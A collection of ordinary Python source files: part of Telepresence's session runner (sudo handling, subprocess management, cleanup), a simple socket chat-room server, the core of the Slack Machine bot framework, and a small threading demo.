subsequent_indent="T: ",
replace_whitespace=False,
drop_whitespace=False,
)
self.session_id = uuid.uuid4().hex
# Log some version info
self.output.write("Python {}".format(sys.version))
cache_dir = os.path.expanduser("~/.cache/telepresence")
os.makedirs(cache_dir, exist_ok=True)
cache_filename = os.path.join(cache_dir, "cache.json")
self.cache = Cache.load(cache_filename)
self.cache.invalidate(12 * 60 * 60)
self.add_cleanup("Save caches", self.cache.save, cache_filename)
# Docker for Mac doesn't share TMPDIR, so make sure we use /tmp
# Docker for Windows can't access /tmp, so use a directory it can
tmp_dir = "/tmp"
if self.is_wsl:
tmp_dir = "/c/temp"
if not os.path.exists(tmp_dir):
os.makedirs(tmp_dir)
self.temp = Path(mkdtemp(prefix="tel-", dir=tmp_dir))
(self.temp / "session_id.txt").write_text(self.session_id)
self.add_cleanup("Remove temporary directory", rmtree, str(self.temp))
# Adjust PATH to cover common locations for conntrack, ifconfig, etc.
# Also maybe prepend Telepresence's libexec directory.
path = os.environ.get("PATH", os.defpath)
path_elements = path.split(os.pathsep)
for additional in "/usr/sbin", "/sbin":
if additional not in path_elements:
path += ":" + additional
try:
libexec = TELEPRESENCE_BINARY.parents[1] / "libexec"
except IndexError:
libexec = TELEPRESENCE_BINARY / "does_not_exist_please"
if libexec.exists():
path = "{}:{}".format(libexec, path)
os.environ["PATH"] = path
def span(
self, name: str = "", context: bool = True, verbose: bool = True
) -> Span:
"""Write caller's frame info to the log."""
if context:
frame = currentframe()
assert frame is not None # mypy
info = getframeinfo(frame.f_back)
tag = "{}:{}({})".format(
os.path.basename(info.filename), info.lineno,
"{},{}".format(info.function, name) if name else info.function
)
else:
tag = name
s = Span(self, tag, self.current_span, verbose=verbose)
self.current_span = s
s.begin()
return s
def write(self, message: str, prefix: str = "TEL") -> None:
"""Don't use this..."""
return self.output.write(message, prefix)
def read_logs(self) -> str:
"""Return the end of the contents of the log"""
sleep(2.0)
return self.output.read_logs()
def show(self, message: str) -> None:
"""Display a message to the user on stderr"""
self.write(message, prefix=">>>")
for line in message.splitlines():
print(self.wrapper.fill(line), file=sys.stderr)
def show_raw(self, message: str) -> None:
"""Display a message to the user on stderr (no reformatting)"""
self.write(message, prefix=">>>")
for line in message.splitlines():
print(self.raw_wrapper.fill(line), file=sys.stderr)
def make_temp(self, name: str) -> Path:
res = self.temp / name
res.mkdir()
return res
# Privilege escalation (sudo)
def _hold_sudo(self) -> None:
counter = 0
while self.sudo_held:
# Sleep between calls to sudo
if counter < 30:
sleep(1)
counter += 1
else:
try:
self.check_call(["sudo", "-n", "echo", "-n"])
counter = 0
except CalledProcessError:
self.sudo_held = False
self.write("Attempt to hold on to sudo privileges failed")
self.write("(sudo privileges holder thread exiting)")
def _drop_sudo(self) -> None:
self.sudo_held = False
def require_sudo(self) -> None:
"""
Grab sudo and hold on to it. Show a clear prompt to the user.
"""
if self.sudo_held:
return
self.require(["sudo"], "Some operations require elevated privileges")
try:
# See whether we can grab privileges without a password
self.check_call(["sudo", "-n", "echo", "-n"])
except CalledProcessError:
# Apparently not. Prompt clearly then sudo again.
self.show(
"How Telepresence uses sudo: " +
"https://www.telepresence.io/reference/install#dependencies"
)
self.show("Invoking sudo. Please enter your sudo password.")
try:
self.check_call(["sudo", "echo", "-n"])
except CalledProcessError:
raise self.fail("Unable to escalate privileges with sudo")
self.sudo_held = True
Thread(target=self._hold_sudo).start()
self.add_cleanup("Kill sudo privileges holder", self._drop_sudo)
# Dependencies
def depend(self, commands: typing.Iterable[str]) -> typing.List[str]:
"""
Find unavailable commands from a set of dependencies
"""
missing = []
for command in commands:
path = which(command)
if path:
self.write("Found {} -> {}".format(command, path))
else:
missing.append(command)
return missing
def require(self, commands: typing.Iterable[str], message: str) -> None:
"""
Verify that a set of dependencies (commands that can be called from the
shell) are available. Fail with an explanation if any is unavailable.
"""
missing = self.depend(commands)
if missing:
self.show("Required dependencies not found in your PATH:")
self.show(" {}".format(" ".join(missing)))
self.show(message)
raise self.fail(
"Please see " +
"https://www.telepresence.io/reference/install#dependencies " +
"for more information."
)
def require_docker(self) -> None:
self.require(["docker"], "Needed for the container method.")
# Check whether `sudo docker` is required.
# FIXME(ark3): This assumes a local docker. We check for that in a
# roundabout way elsewhere. Consider using `docker context inspect` to
# do all of this stuff in a way that may be supported.
dsock = "/var/run/docker.sock"
if os.path.exists(dsock) and not os.access(dsock, os.W_OK):
self.require_sudo()
self.sudo_for_docker = True
def docker(self, *args: str, env: bool = False) -> typing.List[str]:
if not self.sudo_for_docker:
return ["docker"] + list(args)
if env:
return ["sudo", "-E", "docker"] + list(args)
return ["sudo", "docker"] + list(args)
# Time
def time(self) -> float:
"""
Return the time in seconds since the epoch.
"""
return time()
def sleep(self, seconds: float) -> None:
"""
Suspend execution for the given number of seconds.
"""
sleep(seconds)
def loop_until(self, loop_seconds: float,
sleep_seconds: float) -> typing.Iterable[int]:
"""
Yield a loop counter during the loop time, then end. Sleep the
specified amount between loops. Always run at least once. Check for
background process early exit while looping.
:param loop_seconds: How long the loop should run
:param sleep_seconds: How long to sleep between loops
:return: yields the loop counter, 0 onward
"""
end_time = self.time() + loop_seconds - sleep_seconds
counter = 0
while True:
yield counter
if self.quitting:
self.bg_process_crash()
# Not reached
counter += 1
if self.time() >= end_time:
break
self.sleep(sleep_seconds)
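# Illustrative usage of loop_until (not part of the original class): poll a
# hypothetical condition for up to 30 seconds, sleeping 0.25s between
# attempts, while still honoring background-process crash detection.
#
#   for _ in runner.loop_until(30, 0.25):
#       if condition_met():  # hypothetical predicate
#           break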
# Subprocesses
def _make_logger(
self, track: int, do_log: bool, do_capture: bool, capture_limit: int
) -> _Logger:
"""Create a logger that optionally captures what is logged"""
prefix = "{:>3d}".format(track)
def write(line: str) -> None:
self.output.write(mask_sensitive_data(line), prefix=prefix)
return _Logger(write, do_log, do_capture, capture_limit)
def _run_command_sync(
self,
messages: typing.Tuple[str, str],
log_stdout: bool,
stderr_to_stdout: bool,
args: typing.List[str],
capture_limit: int,
timeout: typing.Optional[float],
input: typing.Optional[bytes],
env: typing.Optional[typing.Dict[str, str]],
) -> str:
"""
Run a command synchronously. Log stdout (optionally) and stderr (if not
redirected to stdout). Capture stdout and stderr, at least for
exceptions. Return output.
"""
self.counter = track = self.counter + 1
self.output.write(
"[{}] {}: {}".format(track, messages[0], str_command(args))
)
span = self.span(
"{} {}".format(track, str_command(args))[:80],
False,
verbose=False
)
kwargs = {} # type: typing.Dict[str, typing.Any]
if env is not None:
kwargs["env"] = env
if input is not None:
kwargs["input"] = input
# Set up capture/logging
out_logger = self._make_logger(
track, log_stdout or self.verbose, True, capture_limit
)
if stderr_to_stdout:
# This logger won't be used
err_logger = self._make_logger(track, False, False, capture_limit)
kwargs["stderr"] = STDOUT
else:
err_logger = self._make_logger(track, True, True, capture_limit)
# Launch the process and wait for it to finish
try:
process = _launch_command(args, out_logger, err_logger, **kwargs)
except OSError as exc:
# Failed to launch, so no need to wrap up capture stuff.
self.output.write("[{}] {}".format(track, exc))
raise
TIMED_OUT_RETCODE = -999
try:
retcode = process.wait(timeout)
except TimeoutExpired:
retcode = TIMED_OUT_RETCODE # sentinel for timeout
process.terminate()
try:
process.wait(timeout=1)
except TimeoutExpired:
process.kill()
process.wait()
output = out_logger.get_captured()
spent = span.end()
if retcode == TIMED_OUT_RETCODE:
# Command timed out. Need to raise TE.
self.output.write(
"[{}] timed out after {:0.2f} secs.".format(track, spent)
)
assert timeout is not None
raise TimeoutExpired(
args,
timeout,
output,
None if stderr_to_stdout else err_logger.get_captured(),
)
if retcode:
# Command failed. Need to raise CPE.
self.output.write(
"[{}] exit {} in {:0.2f} secs.".format(track, retcode, spent)
)
raise CalledProcessError(
retcode,
args,
output,
None if stderr_to_stdout else err_logger.get_captured(),
)
# Command succeeded. Just return the output
self.output.write(
"[{}] {} in {:0.2f} secs.".format(track, messages[1], spent)
)
return output
def check_call(
self,
args: typing.List[str],
timeout: typing.Optional[float] = None,
input: typing.Optional[bytes] = None,
env: typing.Optional[typing.Dict[str, str]] = None,
) -> None:
"""Run a subprocess, make sure it exited with 0."""
self._run_command_sync(
("Running", "ran"),
True,
False,
args,
10, # limited capture, only used for error reporting
timeout,
input,
env,
)
def get_output(
self,
args: typing.List[str],
timeout: typing.Optional[float] = None,
stderr_to_stdout: bool = False,
reveal: bool = False,
input: typing.Optional[bytes] = None,
env: typing.Optional[typing.Dict[str, str]] = None,
) -> str:
"""Return (stripped) command result as unicode string."""
output = self._run_command_sync(
("Capturing", "captured"),
reveal,
stderr_to_stdout,
args,
-1, # unlimited capture
timeout,
input,
env,
)
return output
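# Illustrative usage (the commands shown are hypothetical, not taken from the
# original file): check_call() raises CalledProcessError on a non-zero exit
# and TimeoutExpired when the timeout elapses; get_output() additionally
# returns the captured stdout.
#
#   runner.check_call(["kubectl", "apply", "-f", "deploy.yaml"], timeout=30)
#   version = runner.get_output(["kubectl", "version", "--client"], reveal=True)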
def launch(
self,
name: str,
args: typing.List[str],
killer: typing.Optional[typing.Callable[[], None]] = None,
notify: bool = False,
keep_session: bool = False,
bufsize: int = -1,
is_critical: bool = True,
) -> None:
"""Asyncrounously run a process.
:param name: A human-friendly name to describe the process.
:param args: The command to run.
:param killer: How to signal to the process that it should
stop. The default is to call Popen.terminate(), which on
POSIX OSs sends SIGTERM.
:param notify: Whether to synchronously wait for the process
to send "READY=1" via the ``sd_notify(3)`` interface before
returning.
:param keep_session: Whether to run the process in the current
session (as in ``setsid()``), or in a new session. The
default is to run in a new session, in order to prevent
keyboard signals from getting forwarded. However, running in
a new session breaks sudo if it is configured to ask for a
password.
:param bufsize: See ``subprocess.Popen()``.
:param is_critical: Whether this process quitting should end this
Telepresence session. Default is True because that used to be the
only supported behavior.
:return: ``None``.
"""
self.counter = track = self.counter + 1
out_logger = self._make_logger(track, True, True, 10)
def done(proc: "Popen[str]") -> None:
retcode = proc.wait()
self.output.write("[{}] {}: exit {}".format(track, name, retcode))
recent = "\n ".join(out_logger.get_captured().split("\n"))
if recent:
recent = "\nRecent output was:\n {}".format(recent)
message = (
"Background process ({}) exited with return code {}. "
"Command was:\n {}\n{}"
).format(name, retcode, str_command(args), recent)
self.ended.append(message)
if is_critical:
# End the program because this is a critical subprocess
self.quitting = True
else:
# Record the failure but don't quit
self.output.write(message)
self.output.write(
"[{}] Launching {}: {}".format(track, name, str_command(args))
)
env = os.environ.copy()
if notify:
sockname = str(self.temp / "notify-{}".format(track))
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(sockname)
env["NOTIFY_SOCKET"] = sockname
try:
process = _launch_command(
args,
out_logger,
out_logger, # Won't be used
done=done,
# kwargs
start_new_session=not keep_session,
stderr=STDOUT,
bufsize=bufsize,
env=env
)
except OSError as exc:
self.output.write("[{}] {}".format(track, exc))
raise
if killer is None:
killer = partial(kill_process, process)
self.add_cleanup("Kill BG process [{}] {}".format(track, name), killer)
if notify:
# We need a select()able notification of death in case the
# process dies before sending READY=1. In C, I'd do this
# same pipe trick, but close the pipe from a SIGCHLD
# handler, which is lighter than a thread. But I fear
# that a SIGCHLD handler would interfere with the Python
# runtime? We're already using several threads per
# launched process, so what's the harm in one more?
pr, pw = os.pipe()
def pipewait() -> None:
process.wait()
os.close(pw)
Thread(target=pipewait, daemon=True).start()
# Block until either the process exits or we get a READY=1
# line on the socket.
while process.poll() is None:
r, _, x = select.select([pr, sock], [], [pr, sock])
if sock in r or sock in x:
lines = sock.recv(4096).decode("utf-8").split("\n")
if "READY=1" in lines:
break
os.close(pr)
sock.close()
# Cleanup
def add_cleanup(
self, name: str, callback: typing.Callable[..., None],
*args: typing.Any, **kwargs: typing.Any
) -> None:
"""
Set up callback to be called during cleanup processing on exit.
:param name: Logged for debugging
:param callback: What to call during cleanup
"""
cleanup_item = _CleanupItem(name, callback, args, kwargs)
self.cleanup_stack.append(cleanup_item)
def _signal_received(self, sig_num: int, frame: typing.Any) -> None:
try:
sig_name = signal.Signals(sig_num).name
except (ValueError, AttributeError):
sig_name = str(sig_num)
try:
frame_name = frame.f_code.co_name
except AttributeError:
frame_name = "(unknown)"
self.show(
"Received signal {} while in function {}".format(
sig_name, frame_name
)
)
self.exit(0)
def _do_cleanup(self) -> typing.List[typing.Tuple[str, BaseException]]:
failures = []
self.show("Exit cleanup in progress")
for name, callback, args, kwargs in reversed(self.cleanup_stack):
self.write("(Cleanup) {}".format(name))
try:
callback(*args, **kwargs)
except BaseException as exc:
self.write("(Cleanup) {} failed:".format(name))
self.write("(Cleanup) {}".format(exc))
failures.append((name, exc))
return failures
@contextmanager
def cleanup_handling(self) -> typing.Iterator[None]:
signal.signal(signal.SIGTERM, self._signal_received)
signal.signal(signal.SIGHUP, self._signal_received)
try:
yield
finally:
failures = self._do_cleanup()
if failures:
self.show("WARNING: Failures during cleanup. See above.")
# Exit
def bg_process_crash(self) -> None:
"""
Invoke the crash reporter, emitting additional information about the
background process early exit(s) that prompted this crash.
"""
self.quitting = True # should be a no-op
message = "{} background process(es) crashed".format(len(self.ended))
failures = "\n\n".join(self.ended)
raise BackgroundProcessCrash(message, failures)
def fail(self, message: str) -> SystemExit:
"""
Report failure to the user and exit. Does not return. Cleanup will run
before the process ends. This does not invoke the crash reporter; an
uncaught exception will achieve that, e.g., RuntimeError.
Failure is indicated with exit code 255 (like ssh). The user process's
exit code is propagated by successful sessions.
:param message: So the user knows what happened
"""
self.quitting = True
self.show("\n")
self.show(message)
self.show("\n")
code = 255
self.write("EXITING with status code {}".format(code))
exit(code)
return SystemExit(code) # Not reached; just here for the linters
def exit(self, code: int) -> SystemExit:
"""
Exit after a successful session. Does not return. Cleanup will run
before the process ends.
Success means exiting with the user process's exit code.
"""
self.quitting = True
Span.emit_summary = True
self.write("EXITING successful session.")
exit(code)
return SystemExit(code) # Not reached; just here for the linters
def wait_for_exit(self, main_process: "Popen[str]") -> None:
"""
Monitor main process and background items until done
"""
main_code = None
def wait_for_process(p: "Popen[str]") -> None:
"""Wait for process and set main_code and self.quitting flag
Note that main_code is defined in the parent function,
so it is declared as nonlocal
See https://github.com/telepresenceio/telepresence/issues/1003
"""
nonlocal main_code
main_code = p.wait()
self.quitting = True
self.write("Everything launched. Waiting to exit...")
span = self.span()
Thread(target=wait_for_process, args=(main_process, )).start()
while not self.quitting:
sleep(0.1)
span.end()
if main_code is not None:
# User process exited, we're done. Automatic shutdown cleanup
# will kill subprocesses.
main_command = str_command(str(arg) for arg in main_process.args)
self.write("Main process ({})".format(main_command))
self.write(" exited with code {}.".format(main_code))
message = "Your process "
if main_code:
message += "exited with return code {}.".format(main_code)
else:
message += "has exited."
self.show(message)
raise self.exit(main_code)
# Something else exited, setting the quitting flag.
# Unfortunately torsocks doesn't deal well with connections
# being lost, so best we can do is shut down.
if self.ended:
self.show("\n")
self.show_raw(self.ended[0])
self.show("\n")
message = (
"Proxy to Kubernetes exited. This is typically due to"
" a lost connection."
)
raise self.fail(message)
|
Server.py
|
import socket
from threading import Thread
import time
data = open("../assets/version.txt", "r").read()
print("Chat Room 101 | " + data)
time.sleep(1)
clients = {}
addresses = {}
host = socket.gethostname()
ip = socket.gethostbyname(host)
port = 8080
s = socket.socket()
s.bind((host, port))
print(host, ip)
print("Ask clients to enter host IP as :", ip, "and port as :", port)
def accept_client():
while True:
client_con, client_address = s.accept()
client_con.send(
"Hey! Welcome to the Chat Room. Enter Your Name To Continue.".encode("utf8")
)
addresses[client_address] = client_address
Thread(target=handle_client, args=(client_con, client_address)).start()
print(client_address, "Has Connected")
def broadcast(message, prefix=""):
for x in clients:
x.send(bytes(prefix, "utf8") + message)
def handle_client(con, adr):
name = con.recv(1024).decode("utf8")
welcome_message = (
"Thanks for using this Chat Room "
+ name
+ ". You can use #quit if you want to exit"
)
con.send(bytes(welcome_message, "utf8"))
print(name, "has joint the chat")
message = name + " has joint the chat!"
broadcast(bytes(message, "utf8"))
clients[con] = name
try:
while True:
message = con.recv(1024)
if message != bytes("#quit", "utf8"):
broadcast(message, name + ": ")
else:
con.close()
del clients[con]
broadcast(bytes(name + " has left the chat.", "utf8"))
except:
print(name + " has left the chat")
if __name__ == "__main__":
s.listen()
print("The Server Is Now Online")
t1 = Thread(target=accept_client)
t1.start()
t1.join() # Waits for one thread to stop before running the next.
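# Illustrative client-side sketch (an assumption, not part of this server
# file): connect, answer the name prompt, then exchange UTF-8 messages;
# sending "#quit" makes the server close the connection.
#
#   import socket
#   c = socket.socket()
#   c.connect(("<server ip>", 8080))
#   print(c.recv(1024).decode("utf8"))      # welcome / name prompt
#   c.send("Alice".encode("utf8"))          # name
#   c.send("Hello everyone".encode("utf8"))
#   c.send("#quit".encode("utf8"))
#   c.close()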
|
core.py
|
import inspect
import logging
import sys
import time
from typing import Callable
from threading import Thread
import dill
from clint.textui import puts, indent, colored
from slack import RTMClient
from machine.vendor import bottle
from machine.dispatch import EventDispatcher
from machine.plugins.base import MachineBasePlugin
from machine.settings import import_settings
from machine.clients.singletons.scheduling import Scheduler
from machine.clients.singletons.storage import Storage
from machine.clients.slack import SlackClient
from machine.clients.singletons.slack import LowLevelSlackClient
from machine.storage import PluginStorage
from machine.utils.module_loading import import_string
from machine.utils.text import show_valid, show_invalid, warn, error, announce
logger = logging.getLogger(__name__)
def callable_with_sanitized_event(fn: Callable):
def sanitized_call(**payload):
return fn(payload['data'])
return sanitized_call
class Machine:
def __init__(self, settings=None):
announce("Initializing Slack Machine:")
with indent(4):
puts("Loading settings...")
if settings:
self._settings = settings
found_local_settings = True
else:
self._settings, found_local_settings = import_settings()
fmt = '[%(asctime)s][%(levelname)s] %(name)s %(filename)s:%(funcName)s:%(lineno)d |' \
' %(message)s'
date_fmt = '%Y-%m-%d %H:%M:%S'
log_level = self._settings.get('LOGLEVEL', logging.ERROR)
logging.basicConfig(
level=log_level,
format=fmt,
datefmt=date_fmt,
)
if not found_local_settings:
warn("No local_settings found! Are you sure this is what you want?")
if 'SLACK_API_TOKEN' not in self._settings:
error("No SLACK_API_TOKEN found in settings! I need that to work...")
sys.exit(1)
self._client = LowLevelSlackClient()
puts("Initializing storage using backend: {}".format(self._settings['STORAGE_BACKEND']))
self._storage = Storage.get_instance()
logger.debug("Storage initialized!")
self._plugin_actions = {
'listen_to': {},
'respond_to': {}
}
self._help = {
'human': {},
'robot': {}
}
self._dispatcher = EventDispatcher(self._plugin_actions, self._settings)
puts("Loading plugins...")
self.load_plugins()
logger.debug("The following plugin actions were registered: %s", self._plugin_actions)
def load_plugins(self):
with indent(4):
logger.debug("PLUGINS: %s", self._settings['PLUGINS'])
for plugin in self._settings['PLUGINS']:
for class_name, cls in import_string(plugin):
if issubclass(cls, MachineBasePlugin) and cls is not MachineBasePlugin:
logger.debug("Found a Machine plugin: {}".format(plugin))
storage = PluginStorage(class_name)
instance = cls(SlackClient(), self._settings, storage)
missing_settings = self._register_plugin(class_name, instance)
if missing_settings:
show_invalid(class_name)
with indent(4):
error_msg = "The following settings are missing: {}".format(
", ".join(missing_settings)
)
puts(colored.red(error_msg))
puts(colored.red("This plugin will not be loaded!"))
del instance
else:
instance.init()
show_valid(class_name)
self._storage.set('manual', dill.dumps(self._help))
def _register_plugin(self, plugin_class, cls_instance):
missing_settings = []
missing_settings.extend(self._check_missing_settings(cls_instance.__class__))
methods = inspect.getmembers(cls_instance, predicate=inspect.ismethod)
for _, fn in methods:
missing_settings.extend(self._check_missing_settings(fn))
if missing_settings:
return missing_settings
if cls_instance.__doc__:
class_help = cls_instance.__doc__.splitlines()[0]
else:
class_help = plugin_class
self._help['human'][class_help] = self._help['human'].get(class_help, {})
self._help['robot'][class_help] = self._help['robot'].get(class_help, [])
for name, fn in methods:
if hasattr(fn, 'metadata'):
self._register_plugin_actions(plugin_class, fn.metadata, cls_instance, name, fn,
class_help)
def _check_missing_settings(self, fn_or_class):
missing_settings = []
if hasattr(fn_or_class, 'metadata') and 'required_settings' in fn_or_class.metadata:
for setting in fn_or_class.metadata['required_settings']:
if setting not in self._settings:
missing_settings.append(setting.upper())
return missing_settings
def _register_plugin_actions(self, plugin_class, metadata, cls_instance, fn_name, fn,
class_help):
fq_fn_name = "{}.{}".format(plugin_class, fn_name)
if fn.__doc__:
self._help['human'][class_help][fq_fn_name] = self._parse_human_help(fn.__doc__)
for action, config in metadata['plugin_actions'].items():
if action == 'process':
event_type = config['event_type']
RTMClient.on(event=event_type, callback=callable_with_sanitized_event(fn))
if action in ['respond_to', 'listen_to']:
for regex in config['regex']:
event_handler = {
'class': cls_instance,
'class_name': plugin_class,
'function': fn,
'regex': regex
}
key = "{}-{}".format(fq_fn_name, regex.pattern)
self._plugin_actions[action][key] = event_handler
self._help['robot'][class_help].append(self._parse_robot_help(regex, action))
if action == 'schedule':
Scheduler.get_instance().add_job(fq_fn_name, trigger='cron', args=[cls_instance],
id=fq_fn_name, replace_existing=True, **config)
if action == 'route':
for route_config in config:
bottle.route(**route_config)(fn)
@staticmethod
def _parse_human_help(doc):
summary = doc.splitlines()[0].split(':')
if len(summary) > 1:
command = summary[0].strip()
cmd_help = summary[1].strip()
else:
command = "??"
cmd_help = summary[0].strip()
return {
'command': command,
'help': cmd_help
}
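# Illustrative example (assumption): a plugin method whose docstring starts
# with "greet <name>: say hello to <name>" is parsed as
#   {'command': 'greet <name>', 'help': 'say hello to <name>'}
# while a first line without a colon falls back to command "??".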
@staticmethod
def _parse_robot_help(regex, action):
if action == 'respond_to':
return "@botname {}".format(regex.pattern)
else:
return regex.pattern
def _keepalive(self):
while True:
time.sleep(self._settings['KEEP_ALIVE'])
self._client.ping()
logger.debug("Client Ping!")
def run(self):
announce("\nStarting Slack Machine:")
with indent(4):
show_valid("Connected to Slack")
Scheduler.get_instance().start()
show_valid("Scheduler started")
if not self._settings['DISABLE_HTTP']:
self._bottle_thread = Thread(
target=bottle.run,
kwargs=dict(
host=self._settings['HTTP_SERVER_HOST'],
port=self._settings['HTTP_SERVER_PORT'],
server=self._settings['HTTP_SERVER_BACKEND'],
)
)
self._bottle_thread.daemon = True
self._bottle_thread.start()
show_valid("Web server started")
if self._settings['KEEP_ALIVE']:
self._keep_alive_thread = Thread(target=self._keepalive)
self._keep_alive_thread.daemon = True
self._keep_alive_thread.start()
show_valid(
"Keepalive thread started [Interval: %ss]" % self._settings['KEEP_ALIVE']
)
show_valid("Dispatcher started")
self._dispatcher.start()
|
t.py
|
import logging
import threading
import time
def thread_function(name):
logging.info("Thread %s: starting", name)
time.sleep(20)
logging.info("Thread %s: finishing", name)
if __name__ == "__main__":
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
logging.info("Main : before creating thread")
x = threading.Thread(target=thread_function, args=(1,))
logging.info("Main : before running thread")
x.start()
logging.info("Main : wait for the thread to finish")
x.join()
logging.info("Main : all done")
|